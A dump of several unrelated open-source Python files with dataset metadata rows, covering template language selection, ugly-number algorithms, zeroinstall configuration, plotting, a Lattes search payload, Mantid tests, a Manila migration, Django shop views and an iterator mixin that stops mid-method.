languages.append(DEFAULT_LANGUAGE)
logging.debug("Supported languages: %s" % _SUPPORTED_LANGUAGES)
for lang in languages:
lang = lang.replace('-', '_')
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
if '_' in lang:
lang = lang.split('_')[0]
file_name = os.path.join(TEMPLATES_DIR, lang, category, "%s.tmpl" % template_name)
if lang in _SUPPORTED_LANGUAGES and os.path.exists(file_name):
return template.render(file_name, variables)
raise NotImplementedError("Template not found!")
@returns([str])
@arguments(header=unicode)
def get_languages_from_header(header):
if not header:
return [DEFAULT_LANGUAGE]
try:
languages = list()
for item in header.split(','):
items = item.split(';')
lang = items[0]
splitted = lang.split('-')
if len(splitted) == 2:
lang = '%s_%s' % (splitted[0].lower(), splitted[1].upper())
if len(items) == 1:
languages.append((lang, 1.0))
else:
qualifier = items[1].split("=")[1]
languages.append((lang, float(qualifier)))
return [str(i[0]) for i in sorted(languages, key=lambda x: x[1], reverse=True)]
except:
logging.exception("Could not parse language header.")
return [DEFAULT_LANGUAGE]
@returns([str])
@arguments(request=object)
def get_languages_from_request(request):
return get_languages_from_header(request.headers.get('Accept-Language', None))
| apache-2.0 | -4,756,188,799,871,613,000 | 38.955556 | 113 | 0.666574 | false |
shub0/algorithm-data-structure | python/ugly_nums.py | 1 | 1800 | '''
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
'''
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num <= 0:
return self.isUgly(-1 * num)
while num > 1:
if (num % 2 == 0):
num /= 2
elif (num % 3 == 0):
num /= 3
elif (num % 5 == 0):
num /= 5
else:
return False
return True
def nthSuperUglyNumber(self, n, primes):
"""
:type n: int
:type primes: List[int]
:rtype: int
"""
size = len(primes)
nums = [1]
indices = [0] * size
local_num = [0] * size
while n > 1:
local_num = [ primes[index] * nums[indices[index]] for index in range(size) ]
num = min(local_num)
for index in range(size):
if local_num[index] == num:
indices[index] += 1
nums.append(num)
n -= 1
return nums[-1]
def nthUglyNumber(self, n):
"""
:type n: int
:rtype: int
"""
nums = [1]
i2,i3,i5=0,0,0
while n > 0:
u2,u3,u5 = nums[i2]*2, nums[i3]*3, nums[i5]*5
num = min(u2, u3, u5)
if num == u2:
i2 += 1
if num == u3:
i3 += 1
if num == u5:
i5 += 1
nums.append(num)
n -= 1
return num[-1]
| bsd-3-clause | 8,164,448,989,103,989,000 | 26.272727 | 165 | 0.436111 | false |
dabrahams/zeroinstall | zeroinstall/injector/config.py | 1 | 4191 | """
Holds user settings and various helper objects.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from zeroinstall import _
import os
from logging import info, warn
import ConfigParser
from zeroinstall import zerostore
from zeroinstall.injector.model import network_levels, network_full
from zeroinstall.injector.namespaces import config_site, config_prog
from zeroinstall.support import basedir
DEFAULT_FEED_MIRROR = "http://roscidus.com/0mirror"
DEFAULT_KEY_LOOKUP_SERVER = 'https://keylookup.appspot.com'
class Config(object):
"""
@ivar auto_approve_keys: whether to approve known keys automatically
@type auto_approve_keys: bool
@ivar handler: handler for main-loop integration
@type handler: L{handler.Handler}
@ivar key_info_server: the base URL of a key information server
@type key_info_server: str
@ivar feed_mirror: the base URL of a mirror site for keys and feeds
@type feed_mirror: str | None
@ivar freshness: seconds since a feed was last checked before it is considered stale
@type freshness: int
"""
__slots__ = ['help_with_testing', 'freshness', 'network_use', 'feed_mirror', 'key_info_server', 'auto_approve_keys',
'_fetcher', '_stores', '_iface_cache', '_handler', '_trust_mgr', '_trust_db']
def __init__(self, handler = None):
self.help_with_testing = False
self.freshness = 60 * 60 * 24 * 30
self.network_use = network_full
self._handler = handler
self._fetcher = self._stores = self._iface_cache = self._trust_mgr = self._trust_db = None
self.feed_mirror = DEFAULT_FEED_MIRROR
self.key_info_server = DEFAULT_KEY_LOOKUP_SERVER
self.auto_approve_keys = True
@property
def stores(self):
if not self._stores:
self._stores = zerostore.Stores()
return self._stores
@property
def iface_cache(self):
if not self._iface_cache:
from zeroinstall.injector import iface_cache
self._iface_cache = iface_cache.iface_cache
#self._iface_cache = iface_cache.IfaceCache()
return self._iface_cache
@property
def fetcher(self):
if not self._fetcher:
from zeroinstall.injector import fetch
self._fetcher = fetch.Fetcher(self)
return self._fetcher
@property
def trust_mgr(self):
if not self._trust_mgr:
from zeroinstall.injector import trust
self._trust_mgr = trust.TrustMgr(self)
return self._trust_mgr
@property
def trust_db(self):
from zeroinstall.injector import trust
self._trust_db = trust.trust_db
@property
def handler(self):
if not self._handler:
from zeroinstall.injector import handler
if os.isatty(1):
self._handler = handler.ConsoleHandler()
else:
self._handler = handler.Handler()
return self._handler
def save_globals(self):
"""Write global settings."""
parser = ConfigParser.ConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', self.help_with_testing)
parser.set('global', 'network_use', self.network_use)
parser.set('global', 'freshness', self.freshness)
parser.set('global', 'auto_approve_keys', self.auto_approve_keys)
path = basedir.save_config_path(config_site, config_prog)
path = os.path.join(path, 'global')
parser.write(open(path + '.new', 'w'))
os.rename(path + '.new', path)
def load_config(handler = None):
config = Config(handler)
parser = ConfigParser.RawConfigParser()
parser.add_section('global')
parser.set('global', 'help_with_testing', 'False')
parser.set('global', 'freshness', str(60 * 60 * 24 * 30)) # One month
parser.set('global', 'network_use', 'full')
parser.set('global', 'auto_approve_keys', 'True')
path = basedir.load_first_config(config_site, config_prog, 'global')
if path:
info("Loading configuration from %s", path)
try:
parser.read(path)
except Exception as ex:
warn(_("Error loading config: %s"), str(ex) or repr(ex))
config.help_with_testing = parser.getboolean('global', 'help_with_testing')
config.network_use = parser.get('global', 'network_use')
config.freshness = int(parser.get('global', 'freshness'))
config.auto_approve_keys = parser.getboolean('global', 'auto_approve_keys')
assert config.network_use in network_levels, config.network_use
return config
| lgpl-2.1 | 1,600,320,682,563,970,000 | 31.238462 | 117 | 0.715581 | false |
cjmathy/ode_model | ode_modeler/plot.py | 1 | 3666 | import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
def plot_all_queries(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from all queries on the same plot.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
if out_format == 'pdf_one':
pdf = PdfPages(os.path.join(out_dir + '/all_queries.pdf'))
if plot_species[0] is 'all':
plot_species = species.keys()
for sp in plot_species:
fig = plt.figure()
for query in queries:
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title(sp)
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.legend(queries)
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(out_dir + '/{}.pdf'.format(sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(os.path.join(out_dir + '/{}.png'.format(sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
def plot_each_query(species, queries, out_dir, out_format,
plot_species, ttot, **kwargs):
'''
Description:
This method creates plots for each species, plotting timecourse curves
from each query separately.
Input:
species - a dictionary mapping strings to Species objects.
queries - a list of query objects.
out_dir - the path to the output directory.
out_format - the file format for output figures.
plot_species - a list containing species names to be plotted. default
is to generate plots for all species.
ttot - the total length of simulation.
'''
if plot_species[0] is 'all':
plot_species = species.keys()
for query in queries:
if out_format == 'pdf_one':
pdf = PdfPages(
os.path.join(
out_dir + '/{}.pdf'.format(query.name)))
for sp in plot_species:
fig = plt.figure()
plt.plot(query.t, query.concentrations[:, species[sp].index])
plt.title('{}, {}'.format(sp, query.name))
plt.ylabel('Concentration (uM)')
plt.xlabel('Time (seconds)')
plt.xticks(np.arange(0, ttot+1, ttot/2))
plt.grid(True)
if out_format == 'pdf_mult':
pdf = PdfPages(
os.path.join(
out_dir + '/{}_{}.pdf'.format(
query.name, sp)))
pdf.savefig()
pdf.close()
if out_format == 'png':
fig.savefig(
os.path.join(
out_dir + '/{}_{}.png'.format(
query.name, sp)))
if out_format == 'pdf_one':
pdf.savefig()
plt.close()
if out_format == 'pdf_one':
pdf.close()
return
| apache-2.0 | 3,636,057,399,998,828,000 | 30.333333 | 78 | 0.533824 | false |
josefson/CNPQ | lattes/search_data.py | 1 | 3395 | # search_data: The data to be used in a search POST.
search_data = {
'metodo': 'buscar',
'acao': '',
'resumoFormacao': '',
'resumoAtividade': '',
'resumoAtuacao': '',
'resumoProducao': '',
'resumoPesquisador': '',
'resumoIdioma': '',
'resumoPresencaDGP': '',
'resumoModalidade': 'Bolsas+de+PQ+de+categorias0',
'modoIndAdhoc': '',
'buscaAvancada': '0',
'filtros.buscaNome': 'true',
'textoBusca': '.',
'buscarDoutores': 'true',
'buscarDemais': 'true',
'buscarBrasileiros': 'true',
'buscarEstrangeiros': 'true',
'paisNascimento': '0',
'textoBuscaTodas': '',
'textoBuscaFrase': '',
'textoBuscaQualquer': '',
'textoBuscaNenhuma': '',
'textoExpressao': '',
'buscarDoutoresAvancada': 'true',
'buscarBrasileirosAvancada': 'true',
'buscarEstrangeirosAvancada': 'true',
'paisNascimentoAvancada': '0',
'filtros.atualizacaoCurriculo': '48',
'quantidadeRegistros': '20',
'filtros.visualizaEnderecoCV': 'true',
'filtros.visualizaFormacaoAcadTitCV': 'true',
'filtros.visualizaAtuacaoProfCV': 'true',
'filtros.visualizaAreasAtuacaoCV': 'true',
'filtros.visualizaIdiomasCV': 'true',
'filtros.visualizaPremiosTitulosCV': 'true',
'filtros.visualizaSoftwaresCV': 'true',
'filtros.visualizaProdutosCV': 'true',
'filtros.visualizaProcessosCV': 'true',
'filtros.visualizaTrabalhosTecnicosCV': 'true',
'filtros.visualizaOutrasProdTecCV': 'true',
'filtros.visualizaArtigosCV': 'true',
'filtros.visualizaLivrosCapitulosCV': 'true',
'filtros.visualizaTrabEventosCV': 'true',
'filtros.visualizaTxtJornalRevistaCV': 'true',
'filtros.visualizaOutrasProdBibCV': 'true',
'filtros.visualizaProdArtCultCV': 'true',
'filtros.visualizaOrientacoesConcluidasCV': 'true',
'filtros.visualizaOrientacoesAndamentoCV': 'true',
'filtros.visualizaDemaisTrabalhosCV': 'true',
'filtros.visualizaDadosComplementaresCV': 'true',
'filtros.visualizaOutrasInfRelevantesCV': 'true',
'filtros.radioPeriodoProducao': '1',
'filtros.visualizaPeriodoProducaoCV': '',
'filtros.categoriaNivelBolsa': '',
'filtros.modalidadeBolsa': '0',
'filtros.nivelFormacao': '0',
'filtros.paisFormacao': '0',
'filtros.regiaoFormacao': '0',
'filtros.ufFormacao': '0',
'filtros.nomeInstFormacao': '',
'filtros.conceitoCurso': '',
'filtros.buscaAtuacao': 'false',
'filtros.codigoGrandeAreaAtuacao': '0',
'filtros.codigoAreaAtuacao': '0',
'filtros.codigoSubareaAtuacao': '0',
'filtros.codigoEspecialidadeAtuacao': '0',
'filtros.orientadorCNPq': '',
'filtros.idioma': '0',
'filtros.grandeAreaProducao': '0',
'filtros.areaProducao': '0',
'filtros.setorProducao': '0',
'filtros.naturezaAtividade': '0',
'filtros.paisAtividade': '0',
'filtros.regiaoAtividade': '0',
'filtros.ufAtividade': '0',
'filtros.nomeInstAtividade': '',
}
# params_payload: The params to be used in a GET pagination.
params_payload = {
'metodo': 'forwardPaginaResultados',
'registros': '1;1000',
'query': ('( +idx_particao:1 +idx_nacionalidade:e) or '
'( +idx_particao:1 +idx_nacionalidade:b)'),
'analise': 'cv',
'tipoOrdenacao': 'null',
'paginaOrigem': 'index.do',
'mostrarScore': 'false',
'mostrarBandeira': 'false',
'modoIndAdhoc': 'null',
}
| mit | -2,093,086,758,916,944,100 | 35.117021 | 60 | 0.653608 | false |
Iwan-Zotow/runEGS | XcIO/names_helper.py | 1 | 2104 | # -*- coding: utf-8 -*-
EGSPHAN_EXT = ".egsphant"
EGSINP_EXT = ".egsinp"
EGSPHSF_EXT = ".egsphsp1"
def make_cup_prefix(radUnit, outerCup, innerCupSer, innerCupNum):
"""
Makes filename prefix given RU, OC, IC info
Parameters
----------
radUnit: string
radiation unit
outerCup: string
outer cup info
innerCupSer: string
inner cup serial line
innerCupNum: integer
inner cup number
returns: string
clinical cup name
"""
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
return "R" + radUnit + "O" + outerCup + "I" + innerCupSer + innerCupNum
def make_qualified_name(file_prefix, cl, shot):
"""
Makes qualified name
Parameters
----------
file_prefix: string
prefix with RU and cup info
cl: collimator
collimator info
shot: (float,float) tuple
shot position
returns: string
fully qualified cup name
"""
return file_prefix + str(cl) + "_" + "Y{0}Z{1}".format(int(shot[0]),int(shot[1]))
def make_egsinput_name(full_prefix):
"""
Makes EGS input name
"""
return full_prefix + EGSINP_EXT
def parse_file_prefix(s):
"""
Parse file prefix string and produce rad.unit, outer cup, inner cup, inner cup number, collimator
"""
radUnit = str(s[1:2])
outerCup = str(s[3:4])
innerCupSer = str(s[5:6])
innerCupNum = str(s[6:8])
coll = int(str(s[9:11]))
return (radUnit, outerCup, innerCupSer, innerCupNum, coll)
def parse_shot(s):
"""
Parse input string to extract shot
"""
idx_shot = s.find("_")
if idx_shot < 0:
raise ValueError("No shot info in input")
sh = s[idx_shot+1:]
idx_Y = sh.find("Y")
if idx_Y < 0:
raise ValueError("No Y shot position in input")
idx_Z = sh.find("Z")
if idx_Z < 0:
raise ValueError("No Z shot position in input")
sh_Y = sh[idx_Y+1:idx_Z]
sh_Z = sh[idx_Z+1:]
return (float(sh_Y), float(sh_Z))
| apache-2.0 | 574,515,979,374,324,900 | 21.147368 | 101 | 0.565589 | false |
mganeva/mantid | scripts/test/isis_powder/ISISPowderInstrumentSettingsTest.py | 1 | 10800 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
from __future__ import (absolute_import, division, print_function)
import mantid
import unittest
import warnings
from six import assertRaisesRegex, assertRegex
from isis_powder.routines import instrument_settings, param_map_entry
class ISISPowderInstrumentSettingsTest(unittest.TestCase):
def test_user_missing_attribute_is_detected(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
with assertRaisesRegex(self, AttributeError, "is required but was not set or passed"):
foo = inst_settings_obj.script_facing_name
del foo
def test_user_missing_attribute_prints_enum_values(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
enum_class=SampleEnum)
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
# Check it still prints the acceptable values when it fails
with assertRaisesRegex(self, AttributeError, "A BAR"):
foo = inst_settings_obj.script_facing_name
del foo
def test_developer_missing_attribute_is_detected(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
with assertRaisesRegex(self, AttributeError, "Please contact the development team"):
foo = inst_settings_obj.not_known
del foo
def test_set_attribute_is_found(self):
expected_value = 100
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
keyword_args = {"user_facing_name": expected_value}
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], kwargs=keyword_args)
self.assertEqual(inst_settings_obj.script_facing_name, expected_value)
def test_updating_attributes_produces_warning_on_init(self):
original_value = 123
new_value = 456
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
# First check this works on init
adv_config = {"user_facing_name": original_value}
keyword_args = {"user_facing_name": new_value}
with warnings.catch_warnings(record=True) as warning_capture:
warnings.simplefilter("always")
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], kwargs=keyword_args,
adv_conf_dict=adv_config)
assertRegex(self, str(warning_capture[-1].message), "which was previously set to")
assertRegex(self, str(warning_capture[-1].message), str(original_value))
assertRegex(self, str(warning_capture[-1].message), str(new_value))
self.assertEqual(inst_settings_obj.script_facing_name, new_value)
def test_updating_attributes_produces_warning(self):
original_value = 123
new_value = 456
second_value = 567
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name")
# First check this works on init
adv_config = {"user_facing_name": original_value}
config_dict = {"user_facing_name": new_value}
keyword_args = {"user_facing_name": second_value}
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], adv_conf_dict=adv_config)
self.assertEqual(inst_settings_obj.script_facing_name, original_value)
# Next try to update the attribute and check it gives a warning
with warnings.catch_warnings(record=True) as warning_capture:
warnings.simplefilter("always")
inst_settings_obj.update_attributes(basic_config=config_dict)
assertRegex(self, str(warning_capture[-1].message), "which was previously set to")
assertRegex(self, str(warning_capture[-1].message), str(original_value))
assertRegex(self, str(warning_capture[-1].message), str(new_value))
warnings_current_length = len(warning_capture)
# Then check that we only get one additional warning when replacing values again not two
inst_settings_obj.update_attributes(kwargs=keyword_args)
self.assertEqual(warnings_current_length + 1, len(warning_capture))
warnings_current_length = len(warning_capture)
# Check that the suppress field works by setting it back to second value
inst_settings_obj.update_attributes(kwargs=config_dict, suppress_warnings=True)
self.assertEqual(warnings_current_length, len(warning_capture))
# Check we only get no additional warnings from setting the value to the same
inst_settings_obj.update_attributes(kwargs=config_dict)
self.assertEqual(warnings_current_length, len(warning_capture))
# Finally check it has took the new value (most recently set)
self.assertEqual(inst_settings_obj.script_facing_name, new_value)
def test_inst_settings_enters_into_dicts(self):
param_entries = [
param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name"),
param_map_entry.ParamMapEntry(ext_name="user_facing_name2", int_name="script_facing_name2")
]
expected_value = 101
# Check recursion of a dictionary containing a dictionary takes place
example_dict = {"user_facing_name": expected_value}
nested_dict = {"some_random_name": example_dict}
inst_settings_obj = instrument_settings.InstrumentSettings(param_map=param_entries, adv_conf_dict=nested_dict)
self.assertEqual(inst_settings_obj.script_facing_name, expected_value)
# Next check that any attributes that a mixed dictionary contains are added
mixed_dict = {"some_random_name2": example_dict,
"user_facing_name2": expected_value * 2}
second_inst_settings_obj = instrument_settings.InstrumentSettings(param_map=param_entries,
adv_conf_dict=mixed_dict)
self.assertEqual(second_inst_settings_obj.script_facing_name, expected_value)
self.assertEqual(second_inst_settings_obj.script_facing_name2, expected_value * 2)
def test_check_enum_check_and_set_works(self):
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
enum_class=SampleEnum)
# First test we cannot set it to a different value
incorrect_value_dict = {"user_facing_name": "wrong"}
with assertRaisesRegex(self, ValueError, "The user specified value: 'wrong' is unknown"):
instrument_settings.InstrumentSettings(param_map=[param_entry],
adv_conf_dict=incorrect_value_dict)
# Check that we can set a known good enum
good_value_dict = {"user_facing_name": SampleEnum.a_bar}
inst_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], adv_conf_dict=good_value_dict)
self.assertEqual(inst_obj.script_facing_name, SampleEnum.a_bar)
# Next check it passes on mixed case and converts it back to the correct case
different_case_dict = {"user_facing_name": SampleEnum.a_bar.lower()}
inst_obj = instrument_settings.InstrumentSettings(param_map=[param_entry], adv_conf_dict=different_case_dict)
self.assertEqual(inst_obj.script_facing_name, SampleEnum.a_bar, "Case is not being converted correctly")
def test_param_map_rejects_enum_missing_friendly_name(self):
# Check that is the friendly name is not set it is correctly detected
with assertRaisesRegex(self, RuntimeError,
"'enum_friendly_name' was not set. Please contact development team."):
param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
enum_class=BadSampleEnum)
def test_optional_attribute_works(self):
optional_param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
optional=True)
param_entry = param_map_entry.ParamMapEntry(ext_name="user_facing_name", int_name="script_facing_name",
optional=False)
# Check that not passing an optional and trying to access it works correctly
opt_inst_obj = instrument_settings.InstrumentSettings(param_map=[optional_param_entry])
self.assertIsNone(opt_inst_obj.script_facing_name)
# Check that setting optional to false still throws
inst_obj = instrument_settings.InstrumentSettings(param_map=[param_entry])
with self.assertRaises(AttributeError):
getattr(inst_obj, "script_facing_name")
# Check if we do set an optional from fresh it does not emit a warning and is set
optional_value = 100
random_value_dict = {"user_facing_name": 8}
optional_value_dict = {"user_facing_name": optional_value}
# Check that setting a value from fresh does not emit a warning
with warnings.catch_warnings(record=True) as warnings_capture:
warnings.simplefilter("always")
num_warnings_before = len(warnings_capture)
opt_inst_obj.update_attributes(kwargs=random_value_dict)
self.assertEqual(len(warnings_capture), num_warnings_before)
# Then check setting it a second time does
opt_inst_obj.update_attributes(kwargs=optional_value_dict)
self.assertEqual(len(warnings_capture), num_warnings_before + 1)
self.assertEqual(opt_inst_obj.script_facing_name, optional_value)
class SampleEnum(object):
enum_friendly_name = "test_enum_name"
# The mixed casing is intentional
a_foo = "a foo"
a_bar = "A BAR"
class BadSampleEnum(object):
a_foo = "a foo"
if __name__ == "__main__":
unittest.main()
| gpl-3.0 | -2,600,867,022,597,814,000 | 49.232558 | 120 | 0.661019 | false |
openstack/manila | manila/db/migrations/alembic/versions/344c1ac4747f_add_share_instance_access_rules_status.py | 1 | 4287 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Remove access rules status and add access_rule_status to share_instance
model
Revision ID: 344c1ac4747f
Revises: dda6de06349
Create Date: 2015-11-18 14:58:55.806396
"""
# revision identifiers, used by Alembic.
revision = '344c1ac4747f'
down_revision = 'dda6de06349'
from alembic import op
from sqlalchemy import Column, String
from manila.common import constants
from manila.db.migrations import utils
priorities = {
'active': 0,
'new': 1,
'error': 2
}
upgrade_data_mapping = {
'active': 'active',
'new': 'out_of_sync',
'error': 'error',
}
def upgrade():
"""Transform individual access rules states to 'access_rules_status'.
WARNING: This method performs lossy converting of existing data in DB.
"""
op.add_column(
'share_instances',
Column('access_rules_status', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
# NOTE(u_glide): Data migrations shouldn't be performed on live clouds
# because it will lead to unpredictable behaviour of running operations
# like migration.
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
access_mappings_query = instance_access_table.select().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False')
status = constants.STATUS_ACTIVE
for access_rule in connection.execute(access_mappings_query):
if (access_rule['state'] == constants.STATUS_DELETING or
access_rule['state'] not in priorities):
continue
if priorities[access_rule['state']] > priorities[status]:
status = access_rule['state']
# pylint: disable=no-value-for-parameter
op.execute(
share_instances_table.update().where(
share_instances_table.c.id == instance['id']
).values({'access_rules_status': upgrade_data_mapping[status]})
)
op.drop_column('share_instance_access_map', 'state')
def downgrade():
op.add_column(
'share_instance_access_map',
Column('state', String(length=255))
)
connection = op.get_bind()
share_instances_table = utils.load_table('share_instances', connection)
instance_access_table = utils.load_table('share_instance_access_map',
connection)
instances_query = (
share_instances_table.select()
.where(share_instances_table.c.status == constants.STATUS_AVAILABLE)
.where(share_instances_table.c.deleted == 'False')
)
for instance in connection.execute(instances_query):
# NOTE(u_glide): We cannot determine if a rule is applied or not in
# Manila, so administrator should manually handle such access rules.
if instance['access_rules_status'] == 'active':
state = 'active'
else:
state = 'error'
# pylint: disable=no-value-for-parameter
op.execute(
instance_access_table.update().where(
instance_access_table.c.share_instance_id == instance['id']
).where(instance_access_table.c.deleted == 'False').values(
{'state': state}
)
)
op.drop_column('share_instances', 'access_rules_status')
| apache-2.0 | 2,971,264,081,608,974,300 | 31.477273 | 76 | 0.642641 | false |
michaelgichia/WeideShop | weideshop/products/views.py | 1 | 3232 | # -*- coding: utf-8 -*-
# Third party stuff
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, DetailView
from django.views.generic.base import TemplateView
# Our stuff
from .models import Product, Subcategory, Category
class CategoryListView(ListView):
"""
Browse all products in the categories.
"""
models = Category
template_name = 'products/category_list.html'
context_object_name = "Category list"
def get_queryset(self):
"""
Returns all categories.
"""
return Category.objects.get_queryset().all()
class SubcategoryListView(ListView):
"""
Browse all products in the sub-catalogue.
"""
model = Subcategory
template_name = 'products/subcategory_list.html'
context_object_name = "Sub-Category list"
category_model = Category
def get_queryset(self):
"""
Returns all sub-categories.
"""
self.category = get_object_or_404(Category, category_slug = self.kwargs.get('category_slug'))
return Subcategory.objects.filter(category = self.category)
def get_context_data(self, **kwargs):
"""
Returns self.category_slug needed
on the subcategory_list.html as a
one of the {% url %} slug params.
"""
context = super(SubcategoryListView, self).get_context_data(**kwargs)
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
return context
class ProductListView(ListView):
"""
Browse products according to previous selected subcategory.
"""
model = Product
template_name = 'products/product_list.html'
context_object_name = "Product list"
def get_context_data(self, **kwargs):
"""
Returns self.category_slug and self.subcategory)slug needed
on the product_list.html as a
one of the {% url %} slug params.
"""
context = super(ProductListView, self).get_context_data(**kwargs)
# Get category_slug
context['categories'] = Category.objects.all()
context['category_slug'] = self.kwargs.get('category_slug')
# Get subcategory_slug
context['subcategories'] = Subcategory.objects.all()
context['subcategory_slug'] = self.kwargs.get('subcategory_slug')
return context
def get_queryset(self):
"""
Browse all products under selected subcategory.
"""
self.sub_category = get_object_or_404(Subcategory, subcategory_slug = self.kwargs.get('subcategory_slug'))
return Product.objects.filter(sub_category = self.sub_category)
class ProductDetailView(DetailView):
"""
Display individual products details
"""
model = Product
def get_object(self):
"""
For unknown reasons :) you must pass self.product_slug
"""
object = get_object_or_404(Product, product_slug=self.kwargs['product_slug'])
return object
class CatalogueListView(ListView):
"""
Display all products in the db.
"""
model = Product
def get_queryset(self):
"""
Returns all categories.
"""
return Product.objects.get_queryset().all()
class CatalogueDetailView(DetailView):
"""
Display individual products details
"""
model = Product
template_name = 'products/product_detail.html'
slug_field = 'product_slug'
def get_object(self):
"""
Call the superclass
"""
object = super(CatalogueDetailView, self).get_object()
return object
| bsd-2-clause | 3,212,083,904,628,984,000 | 23.671756 | 108 | 0.716584 | false |
lcrees/knife | knife/_active.py | 1 | 6481 | # -*- coding: utf-8 -*-
'''active knives'''
from threading import local
from collections import deque
from contextlib import contextmanager
from stuf.utils import clsname
from knife._compat import loads, optimize
class _ActiveMixin(local):
'''active knife mixin'''
def __init__(self, *things, **kw):
'''
Initialize :mod:`knife`.
:argument things: incoming things
:keyword integer snapshots: snapshots to keep (default: ``5``)
'''
incoming = deque()
incoming.extend(things)
super(_ActiveMixin, self).__init__(incoming, deque(), **kw)
# working things
self._work = deque()
# holding things
self._hold = deque()
@property
@contextmanager
def _chain(self, d=optimize):
# take snapshot
snapshot = d(self._in)
# rebalance incoming with outcoming
if self._history:
self._in.clear()
self._in.extend(self._out)
# make snapshot original snapshot?
else:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# move incoming things to working things
self._work.extend(self._in)
yield
out = self._out
# clear outgoing things
out.clear()
# extend outgoing things with holding things
out.extend(self._hold)
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
@property
def _iterable(self):
# derived from Raymond Hettinger Python Cookbook recipe # 577155
call = self._work.popleft
try:
while 1:
yield call()
except IndexError:
pass
def _append(self, thing):
# append thing after other holding things
self._hold.append(thing)
return self
def _xtend(self, things):
# place things after holding things
self._hold.extend(things)
return self
def _prependit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place thing before other holding things
self._in.extendleft(reversed(things))
return self
def _appendit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place things after other incoming things
self._in.extend(things)
return self
def _pipeit(self, knife):
knife.clear()
knife._history.clear()
knife._history.extend(self._history)
knife._original = self._original
knife._baseline = self._baseline
knife._out.extend(self._out)
knife._worker = self._worker
knife._args = self._args
knife._kw = self._kw
knife._wrapper = self._wrapper
knife._pipe = self
return knife
def _unpipeit(self):
piped = self._pipe
piped.clear()
piped._history.clear()
piped._history.extend(self._history)
piped._original = self._original
piped._baseline = self._baseline
piped._out.extend(self._out)
piped._worker = self._worker
piped._args = self._args
piped._kw = self._kw
piped._wrapper = self._wrapper
self.clear()
return piped
def _repr(self, clsname_=clsname, list_=list):
# object representation
return self._REPR.format(
self.__module__,
clsname_(self),
list_(self._in),
list_(self._work),
list_(self._hold),
list_(self._out),
)
def _len(self, len=len):
# length of incoming things
return len(self._in)
class _OutMixin(_ActiveMixin):
'''active output mixin'''
def _undo(self, snapshot=0, loads_=loads):
